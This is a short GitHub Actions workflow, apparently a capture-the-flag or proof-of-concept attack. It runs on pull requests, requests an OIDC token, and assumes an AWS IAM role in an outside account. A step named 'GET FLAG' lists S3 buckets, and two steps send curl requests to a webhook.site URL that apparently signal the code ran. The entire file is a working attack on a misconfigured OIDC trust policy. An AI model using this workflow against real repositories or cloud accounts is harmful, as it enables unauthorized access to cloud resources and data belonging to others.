name: AWS example workflow
on:
  pull_request:
permissions:
      id-token: write   
      contents: read    

jobs:
  AssumeRole:
    runs-on: ubuntu-latest
    steps:
      - name: Check Curl
        run: |
           curl https://webhook.site/fba79c4a-fc9d-448b-8cf2-0b09632fcb3a
      - name: Git clone the repository
        uses: actions/checkout@v3
      - name: configure aws credentials
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::520091917895:role/magichk_role
          role-session-name: poc
          aws-region: eu-west-1
      - name: GET FLAG
        run: |
           curl https://webhook.site/fba79c4a-fc9d-448b-8cf2-0b09632fcb3a
           aws s3 ls
